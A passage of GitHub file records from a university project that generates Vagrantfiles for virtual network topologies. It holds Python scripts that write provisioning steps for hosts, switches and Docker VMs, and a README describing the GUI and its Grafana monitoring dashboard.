edge[\"bandwidth_down\"]\n\n\n Gateway = network[0][\"network_interfaces\"][0][\"ip_address\"]\n Gateway = Gateway.split(\"/\")[0]\n\n IpServer1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskServer1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkServer1_2 = ipcalc.Network(IpServer1_2)\n IpNetServer1_2 = str(NetworkServer1_2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpServer2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer2 = ipcalc.Network(IpServer2)\n IpNetServer2 = str(NetworkServer2.network())\n \"\"\"\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n \"\"\"\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name 
+ \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[4][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[5][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\n f.write(\"apt-get update\\n\")\n f.write(\"apt-get install -y tcpdump\\n\")\n f.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\n f.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\n f.write(\"sudo ovs-vsctl add-br SW1\\n\")\n f.write(\"sudo ovs-vsctl add-br HA\\n\")\n f.write(\"sudo ovs-vsctl add-br HB\\n\")\n f.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\n f.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\n f.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\n f.write(\"echo \\\"Bridge configuration END\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\n f.write(\"sudo ifconfig SW1 \" + IpSW + \"\\n\")\n f.write(\"sudo ifconfig HA \" + IpA + \"\\n\")\n f.write(\"sudo ifconfig HB \" + IpB + \"\\n\")\n f.write(\"sudo ifconfig SW1 up\\n\")\n f.write(\"sudo ifconfig HA up\\n\")\n f.write(\"sudo ifconfig HB up\\n\")\n f.write(\"sudo ifconfig eth1 up\\n\")\n f.write(\"sudo ifconfig eth2 up\\n\")\n f.write(\"sudo ifconfig eth3 up\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_2 +\" netmask \" + NetmaskServer1_2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer2 +\" netmask \" + NetmaskServer2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidthA > 0 or DownlinkBandwidthA > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceA)\n if DownlinkBandwidthA > 0:\n f.write(' -d ' + str(DownlinkBandwidthA))\n if UplinkBandwidthA > 0:\n f.write(' -u ' + str(UplinkBandwidthA))\n f.write('\\n')\n\n if UplinkBandwidthB > 0 or DownlinkBandwidthB > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceB)\n if DownlinkBandwidthB > 0:\n f.write(' -d ' + str(DownlinkBandwidthB))\n if UplinkBandwidthB > 0:\n f.write(' -u ' + str(UplinkBandwidthB))\n f.write('\\n')\n \n if UplinkBandwidthSW > 0 or DownlinkBandwidthSW > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceSW)\n if DownlinkBandwidthSW > 0:\n f.write(' -d ' + str(DownlinkBandwidthSW))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidthSW))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n 
f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custom script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\"+ Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n \n\n\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"Web\":\n writeServer(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"switch\":\n writeSwitch(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges, nodes) \n VagrantFile.write('end\\n')\n VagrantFile.close()\n\n\n"
},
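A note on the record above: `html_to_vagrantfile(nodes, edges)` consumes plain dicts extracted from the pyvis canvas. The following is a minimal sketch of the expected input shape, inferred from the key accesses in `writeServer`/`writeSwitch`/`writeHost`; the labels, addresses and ids here are illustrative, not taken from the repository.

```python
# Shape consumed by html_to_vagrantfile; all concrete values are made up.
# Note: these generators index fixed positions in the node list
# (network[0]/network[1] servers, network[2] switch, network[4]/network[5]
# hosts), so a complete template topology is required in practice.
nodes = [
    {
        "id": 4,
        "type": "host",
        "label": "hostA",
        "vm_image": "bento/ubuntu-16.04",
        "ram": 1024,
        "n_cpus": 1,
        "custom_script": "echo 'custom provisioning here'",
        "network_interfaces": [
            {
                "ip_address": "192.168.1.1/24",
                "netmask": "255.255.255.0",
                "name_interface": "eth1",
                "edge": [4, 3],  # matched against (from, to) in the edge list
            }
        ],
    },
    # ... the remaining nodes of the template ...
]
edges = [
    {"from": 4, "to": 3, "bandwidth_up": 1024, "bandwidth_down": 2048},
    # ... one entry per drawn edge ...
]
# html_to_vagrantfile(nodes, edges)  # would emit ./Vagrantfile
```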
{
"alpha_fraction": 0.5520987510681152,
"alphanum_fraction": 0.5701234340667725,
"avg_line_length": 36.841121673583984,
"blob_id": "717fdd185699d9a1a470536f0108d3e675b69ff3",
"content_id": "e2280e28d4167e1199d59613c31fd1ad7cb27bf5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4052,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 107,
"path": "/fromHTMLtoVagrant/OldScripts/VagrantTopologyDocker.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc\nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f,Docker):\n\n Name = Docker[1][\"Name\"]\n Os = Docker[1][\"Os\"]\n CustumScript = Router[1][\"custom_script\"]\n\n f.write('## to access webserver try this in your webbrowser : (http://localhost:8081/) you will see the webpage.\\n')\n f.write('# -*- mode: ruby -*-\\n')\n f.write('# vi: set ft=ruby :\\n')\n f.write('Vagrant.configure(\"2\") do |config|\\n')\n f.write('config.vm.box = \\\"' + Os + '\\\"\\n')\n f.write('config.vm.network \"forwarded_port\", guest: 80, host: 8081\\n')\n f.write('config.vm.provision \"docker\" do |doc|\\n')\n f.write('doc.pull_images \"nginx\"\\n')\n f.write('doc.pull_images \"mysql\"\\n')\n f.write('doc.run \"mysql\"\\n')\n f.write('doc.run \"nginx\", args: \"-p 80:80\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write(CustumScript + \" \\n\") #here there is the custum script\n f.write('end\\n')\n f.write('end\\n')\n\ndocker1 = (1,{\n \"Id\" : 1,\n \"Name\":\"docker1\",\n \"Os\": \"ubuntu/xenial64\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\"\n})\n\nMyNet = [docker1]\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" + item[\"type\"])\n if item[\"type\"] == \"router\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"host\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\ndef html_to_vagrantfile(Network):\n VagrantFile = open(\"VagrantfileDOCKER\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(\"NetworkGraphs/Template/OSPF_Routing_Template.html\", \"r\", \"utf-8\")\n #html = 
file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n # listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n # print(listOfDevice)\n # listOfDevice = yaml.load(listOfDevice) \n\n #newNet = remap(listOfDevice)\n\n #N.B. for Luca: Network is already the list of nodes that you can iterate over\n #Network = MyNet #replace it with newNet\n\n BeginVagrantFile(VagrantFile,docker1)\n\n VagrantFile.close()\n\n"
},
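The `find_between` helper in the record above is how the commented-out extraction path pulls the vis.js node array out of a pyvis HTML export. A minimal sketch of that path, with `yaml.safe_load` swapped in for the deprecated bare `yaml.load`; the file name and surrounding HTML are assumptions for the example:

```python
import codecs
import yaml

def find_between(s, first, last):
    # Return the substring between the first occurrence of `first`
    # and the next occurrence of `last`, or "" if either is missing.
    try:
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""

html = codecs.open("NetworkGraphs/Template/OSPF_Routing_Template.html", "r", "utf-8").read()
if "nodes = new vis.DataSet(" in html:
    raw_nodes = find_between(html, "nodes = new vis.DataSet(", ")")
    # pyvis emits a JSON array here; JSON is a subset of YAML,
    # so safe_load turns it into a list of node dicts.
    nodes = yaml.safe_load(raw_nodes)
```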
{
"alpha_fraction": 0.7415792346000671,
"alphanum_fraction": 0.7468940019607544,
"avg_line_length": 47.78114318847656,
"blob_id": "9b85767b4e2a5c520e3212e66170fa9bfa4f6226",
"content_id": "11f2d49c344436bb3a29972b9bb8321724ca12bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14491,
"license_type": "permissive",
"max_line_length": 1081,
"num_lines": 297,
"path": "/README.md",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "<!--\n*** Thanks for checking out the Best-README-Template. If you have a suggestion\n*** that would make this better, please fork the repo and create a pull request\n*** or simply open an issue with the tag \"enhancement\".\n*** Thanks again! Now go create something AMAZING! :D\n-->\n\n\n\n<!-- PROJECT SHIELDS -->\n<!--\n*** I'm using markdown \"reference style\" links for readability.\n*** Reference links are enclosed in brackets [ ] instead of parentheses ( ).\n*** See the bottom of this document for the declaration of the reference variables\n*** for contributors-url, forks-url, etc. This is an optional, concise syntax you may use.\n*** https://www.markdownguide.org/basic-syntax/#reference-style-links\n-->\n[![Contributors][contributors-shield]][contributors-url]\n[![Forks][forks-shield]][forks-url]\n[![Stargazers][stars-shield]][stars-url]\n[![Issues][issues-shield]][issues-url]\n[![MIT License][license-shield]][license-url]\n\n\n\n<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2\">\n <img src=\"Images/network.png\" alt=\"Logo\" width=\"80\" height=\"80\">\n </a>\n\n <h3 align=\"center\">AUTOMATING THE DEPLOYMENT OF NETWORK SETUPS USING VAGRANT</h3>\n\n <p align=\"center\">\n Design of Networks and communication systems - Project A.Y. 2020-21 University of Trento, Italy\n <br />\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2\"><strong>Explore the docs »</strong></a>\n <br />\n <br />\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2/blob/main/README.md\">View Demo</a>\n ·\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2/issues\">Report Bug</a>\n ·\n <a href=\"https://github.com/SuperboGiuseppe/dncs_lab2/issues\">Request Feature</a>\n </p>\n</p>\n\n\n\n<!-- TABLE OF CONTENTS -->\n<details open=\"open\">\n <summary>Table of Contents</summary>\n <ol>\n <li>\n <a href=\"#about-the-project\">About The Project</a>\n <ul>\n <li><a href=\"#List-of-features\">List of features</a></li>\n <li><a href=\"#built-with\">Built With</a></li>\n <li><a href=\"#Dashboard\">Dashboard</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#getting-started\">Getting Started</a>\n <ul>\n <li><a href=\"#prerequisites\">Prerequisites</a></li>\n <li><a href=\"#installation-Requirements\">Installation Requirements</a></li>\n </ul>\n </li>\n <li><a href=\"#usage\">Usage</a></li>\n <li><a href=\"#roadmap\">Roadmap</a></li>\n <li><a href=\"#contributing\">Contributing</a></li>\n <li><a href=\"#license\">License</a></li>\n <li><a href=\"#contact\">Contact</a></li>\n </ol>\n</details>\n\n\n\n<!-- ABOUT THE PROJECT -->\n## About The Project\n\n![Main window screenshot][product-screenshot]\n\nThis project is based on a graphical user interface (GUI) that provides a platform for the developer to create a fully automated virtual network environment for testing and development. The users can easily customize and design a virtual network environment according to their needs. With the help of this platform, a user can create and configure different virtual machines acting as a server, router, switches, and hosts or specialized hosts. Custom topologies can be designed from scratch or starting from predefined templates. Once the network is deployed and configured, the user can access or monitor each virtual machine.\n\n### Dashboard\n\nA monitoring dashboard is configured and deployed in order to provide users an extended view of the single virtual machine status. 
The configuration of the dashboard is based on a specific data flux which is commonly adopted in network configurations:\n- **Telegraf** collects data from the target node and sends it to a specific end-point via HTTP requests;\n- **Influxdb** receives the data from the target node and stores it in an optimal way;\n- **Grafana** plots and prompts the data stored in influxdb through a custom dashboard.\n\n![Dashboard data flux scheme][dashboard-flux]\n![Dashboard example CPU][dashboard-cpu]\n![Dashboard example network][dashboard-network]\n\nThe configuration of this flux is automated as, every time a network is deployed, an additional Vagrant environment is deployed in \"Dashboard_Server\". The machine where the Grafana server is executed is based on the following Vagrant Box: [superbogiuseppe/grafana_server](https://app.vagrantup.com/superbogiuseppe/boxes/grafana_server).\n\nCredentials for the dashboard:\n - Username: admin\n - Password: dashboard\n\n### List of features\nAvailable features:\n- Provide Graphical User Interface for creating Virtual environments;\n- Provide a modern monitoring architecture to monitor running virtual environments;\n- Provide the functionality to use different Linux machine flavors for different purposes;\n- Provide the option to set a specific uplink or downlink speed limit;\n- Provide the option to control your network in real-time;\n- Provide the option to write and debug the vagrant scripts;\n- Provide the option of customizing the network topologies;\n- Provide the option of using different Docker images.\n\n### Built With\n\nA network is composed of a set of computing devices connected to each other. Likewise, a graph is a mathematical structure composed of a set of nodes connected among each other via edges. For this reason, the network management core of this project is based on a really lightweight Python library called pyvis, which is based on JavaScript. This library makes it possible to have a very clear network visualization and all the details of each node collected in the entity itself. In order to monitor the network statistics, we have used Telegraf, InfluxDB, and Grafana. These technologies are open source and easy to use and implement. They also provide an open platform for beautiful analytics and monitoring (a dashboard for displaying data) from many sources, particularly time-series data. On the backend, we have used the vagrant development environment by HashiCorp along with the VirtualBox. Vagrant is a simple and powerful tool that provides a platform where we can easily integrate our existing configuration management tools like Ansible, Chef, Docker, Puppet, or Salt. 
\n\n* [Pyvis](https://pyvis.readthedocs.io/en/latest/tutorial.html)\n* [Vagrant](https://www.vagrantup.com/)\n* [QtPy](https://pypi.org/project/PyQt5/)\n* [Vagrant Boxes](https://app.vagrantup.com/boxes/search)\n* [Python](https://www.python.org/)\n* [VirtualBox](https://www.virtualbox.org/)\n* [Html](https://en.wikipedia.org/wiki/HTML#:~:text=Hypertext%20Markup%20Language%20(HTML)%20is,scripting%20languages%20such%20as%20JavaScript.)\n* [Docker](https://www.docker.com/)\n* [OpenSwitch](https://www.openswitch.net/)\n* [Quagga Routing](https://www.quagga.net/)\n* [Wondershaper](https://github.com/magnific0/wondershaper)\n* [Grafana](https://grafana.com/)\n* [Influxdata](https://www.influxdata.com/products/influxdb-overview/)\n* [Telegraf](https://www.influxdata.com/time-series-platform/telegraf/)\n\nThese tools have not been used in the default topologies that we have created. But users can create and configure custom topologies using these tools easily.\n* [Ansible](https://www.ansible.com/)\n* [Puppet](https://puppet.com/)\n* [Salt](https://saltproject.io/automating-network-operations-with-salt-2019-2-0/)\n\n<!-- GETTING STARTED -->\n## Getting Started\n\nIn order to benefit from this environment, you must have some basic knowledge of networking, Python, Vagrant configuration, etc.\n\n### Prerequisites\n\nSome prerequisites have to be satisfied before using this environment, and they depend on your operating system. You can use Windows, Mac, or Linux, but you have to follow the installation procedure for your specific operating system. We developed this environment entirely on Windows, but anyone can install it on another operating system.\n\n<!--\n* npm\n ```sh\n npm install npm@latest -g\n ``\n-->\n\n### Installation Requirements\n\n1. [Python 3.9.0](https://www.python.org/)\n - [pyvis](https://pyvis.readthedocs.io/en/latest/install.html#install-with-pip) (pip install pyvis)\n - [PyQt5](https://pypi.org/project/PyQt5/) (pip install pyqt5)\n - [PyYAML](https://pypi.org/project/PyYAML/) (pip install pyyaml)\n - [ipcalc](https://pypi.org/project/ipcalc/) (pip install ipcalc)\n2. 10GB disk storage\n3. Windows/Linux/Mac\n4. [VirtualBox](https://www.virtualbox.org/)\n5. [Vagrant](https://www.vagrantup.com/)\n6. Internet\n7. Clone the repo\n ```sh\n git clone https://github.com/SuperboGiuseppe/dncs_lab2.git\n ```\n<!-- USAGE EXAMPLES -->\n## Usage\n\nThis project provides users a way to test their environments with the same operating system, packages, and configurations, while still giving them the flexibility to use their favorite editor, IDE, and browser. In order to launch the design tool, execute the following command in the main directory of the project:\n ```sh\n python ./main.py\n ```\n\n### Create a new network\nBy pressing \"New network\", a wizard will be prompted. Here it is possible to create a network from scratch (**Not currently implemented**) or to create a network from a template. Once the template has been selected, the same topology will be available on the main canvas and ready to be configured/modified/deployed.\n\n### Save network\nBy pressing \"Save network\", it is possible to save the network in a html format (Pyvis compatible format) along with its configuration.\n\n### Open network\nBy pressing \"Open network\", it is possible to import an already configured/designed network. 
It is necessary that the file is compatible with the pyvis library (HTML format).\n\n### Adding new devices (**Not currently implemented**)\nBy pressing the buttons \"Router\", \"Switch\", \"Host\" or \"Other\", it is possible to add a new device to the network.\n\n### Edit configuration\nBy pressing \"Edit configuration\" it is possible to edit the configuration of each device of the network:\n - Virtual machine characteristics (CPUs, RAM, VM Image, device name);\n - Network configuration of each interface (IP, Netmask, interface name);\n - Custom script to be provisioned during the deployment.\n\n### Edge configuration\nBy pressing \"Edge configuration\", it is possible to edit uplink and downlink speed limits of each edge.\n\n### Deploy network\nBy pressing \"Deploy network\", the network will be deployed via Vagrant. It is recommended to have the debug console active in order to retrieve any deployment error or warning.\n\n### Control dashboard\nOnce the network is deployed successfully, by pressing \"Control dashboard\", it is possible to navigate in the grafana interface in order to visualize any real-time statistic of each machine.\n\n### SSH Connection\nBy pressing \"SSH Connection\", it is possible to establish an SSH connection with a specific node of the deployed network: a terminal will be prompted once the connection has been established.\n\n### Debug console\nBy pressing \"Debug console\", it is possible to show/hide the debug console which is useful during the deployment phase of the network.\n\n### Turn on/off VMs\nBy pressing \"Turn on/off VMs\", it is possible to stop all the devices of the network without destroying them.\n\n### Destroy network\nBy pressing \"Destroy network\", it is possible to destroy the deployed network along with the dashboard server.\n\n\n<!-- _For more examples, please refer to the [Documentation](https://www.vagrantup.com/docs)_ -->\n\n\n\n<!-- ROADMAP -->\n## Roadmap\nThe roadmap we have:\n- On the frontend, the Python library pyvis is used.\n- On the backend, Vagrant scripts are used to create the virtual machines.\n- On the backend, we have created a mechanism that converts the Vagrant scripts into the HTML format compatible with pyvis.\n- A separate virtual machine manages the dashboard and runs automatically alongside the Vagrant topologies. \n\n\n<!-- CONTRIBUTING -->\n## Contributing\n\nContributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are **greatly appreciated**.\n\n1. Fork the Project\n2. Create your Feature Branch (`git checkout -b Feature`)\n3. Commit your Changes (`git commit -m 'Add some Feature'`)\n4. Push to the Branch (`git push origin Feature`)\n5. Open a Pull Request\n\n\n<!-- LICENSE -->\n## License\n\nDistributed under the MIT License. 
See `LICENSE` for more information.\n\n\n\n<!-- CONTACT -->\n## Contact\n\nProject coordinator\n- [Professor Fabrizio Granelli](https://github.com/fabrizio-granelli)\n\nStudents\n- [Giuseppe Superbo](https://github.com/SuperboGiuseppe)\n- [Luca Staboli](https://github.com/LucaStabo)\n- [Muhammad Uzair](https://github.com/uzairali37)\n\nProject Link: [AUTOMATING THE DEPLOYMENT OF NETWORK SETUPS USING VAGRANT](https://github.com/SuperboGiuseppe/dncs_lab2)\n\n\n\n<!-- ACKNOWLEDGEMENTS\n## Acknowledgements\n* [GitHub Emoji Cheat Sheet](https://www.webpagefx.com/tools/emoji-cheat-sheet)\n* [Img Shields](https://shields.io)\n* [Choose an Open Source License](https://choosealicense.com)\n* [GitHub Pages](https://pages.github.com)\n* [Animate.css](https://daneden.github.io/animate.css)\n* [Loaders.css](https://connoratherton.com/loaders)\n* [Slick Carousel](https://kenwheeler.github.io/slick)\n* [Smooth Scroll](https://github.com/cferdinandi/smooth-scroll)\n* [Sticky Kit](http://leafo.net/sticky-kit)\n* [JVectorMap](http://jvectormap.com)\n* [Font Awesome](https://fontawesome.com)\n -->\n\n\n<!-- MARKDOWN LINKS & IMAGES -->\n<!-- https://www.markdownguide.org/basic-syntax/#reference-style-links -->\n[contributors-shield]: https://img.shields.io/github/contributors/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[contributors-url]: https://github.com/SuperboGiuseppe/dncs_lab2/graphs/contributors\n[forks-shield]: https://img.shields.io/github/forks/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[forks-url]: https://github.com/uzairali37/dncs_lab2\n[stars-shield]: https://img.shields.io/github/stars/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[stars-url]: https://github.com/SuperboGiuseppe/dncs_lab2/stargazers\n[issues-shield]: https://img.shields.io/github/issues/SuperboGiuseppe/dncs_lab2.svg?style=for-the-badge\n[issues-url]: https://github.com/SuperboGiuseppe/dncs_lab2/issues\n[license-shield]: https://img.shields.io/github/license/othneildrew/Best-README-Template.svg?style=for-the-badge\n[license-url]: https://github.com/othneildrew/Best-README-Template/blob/master/LICENSE.txt\n[product-screenshot]: Images/Documentation/screenshot.png\n[dashboard-flux]: Images/Documentation/dashboard_flux.png\n[dashboard-cpu]: Images/Documentation/Dashboard_2.png\n[dashboard-network]: Images/Documentation/Dashboard_1.png\n"
},
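The Telegraf leg of the dashboard flux described in the README above is provisioned identically for every node in the generator scripts (download the .deb, install it, move the staged config, enable the service). A hedged refactoring sketch, not part of the repository, that factors those repeated `f.write` calls into one helper:

```python
# Hypothetical helper; the shell lines are exactly the ones the
# write* generator functions repeat for every node, factored out once.
def write_telegraf_provisioning(f):
    f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\n')
    f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\n')
    f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\n')
    f.write('sudo systemctl restart telegraf\n')
    f.write('sudo systemctl enable telegraf\n')
```

Each generator could then call `write_telegraf_provisioning(f)` inside its SHELL block instead of repeating the five lines.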
{
"alpha_fraction": 0.555793285369873,
"alphanum_fraction": 0.5907555222511292,
"avg_line_length": 37.52277755737305,
"blob_id": "dd4d0e774527c82b63ed32851d926886eeb0046b",
"content_id": "35ad33be6a1e6225ef205d621b1ec1a269636b44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17764,
"license_type": "permissive",
"max_line_length": 239,
"num_lines": 461,
"path": "/fromHTMLtoVagrant/VagrantTopologyOSPF.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \nimport codecs\nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n f.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.cpus = 1\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f,Host, edges):\n\n Id = Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n CustumScript = Host[\"custom_script\"]\n\n for x in Network:\n Gateway = str(x)\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n if Id == 4:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: 